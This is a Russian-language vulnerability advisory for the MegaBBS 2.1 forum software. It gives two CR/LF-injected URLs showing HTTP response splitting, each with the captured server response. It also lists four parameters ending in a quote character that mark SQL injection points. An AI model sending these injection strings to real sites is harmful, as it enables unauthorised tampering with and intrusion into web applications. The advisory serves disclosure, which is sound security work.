Программа: MegaBBS 2.1
Несколько уязвимостей обнаружено в MegaBBS. Удаленный пользователь может выполнить нападение SQL инъекции и HTTP Response Splitting нападение.
Примеры:
1. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/ thread-post.asp?action=writenew&fid=%0
d%0aContent-Length:%200%0d%0a%0d%0aHTTP /1.0%20200%20OK%0d%0aContent-Type:%20
text/html%0d%0aContent-Length:%2033%0d%0a% 0d%0a%3chtml%3eScanned%20by%20Maxp atrol%3c/html%3e%0d%0a&tid=4924&replyto=
22947&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:14:02 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:13:02 GMT
Set-Cookie: guestID=309; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/ Cache-contro <...>
2. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp? fid=%0d%0aContent-Leng th:%200%0d%0a%0d%0aHTTP/1.0%20200%
20OK%0d%0aContent-Type:%20text/html%0d%0aC ontent-Length:%2033%0d%0a%0d%0a%3chtml%3e
Scanned%20by%20Maxpatrol%3c/html%3e %0d%0a&action=writenew&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:34:05 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:33:05 GMT
Set-Cookie: guestID=421; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB= HCGIJIEDMBPIHPCDJFKACJAC; path=/ Cache-contro <...>
3. SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'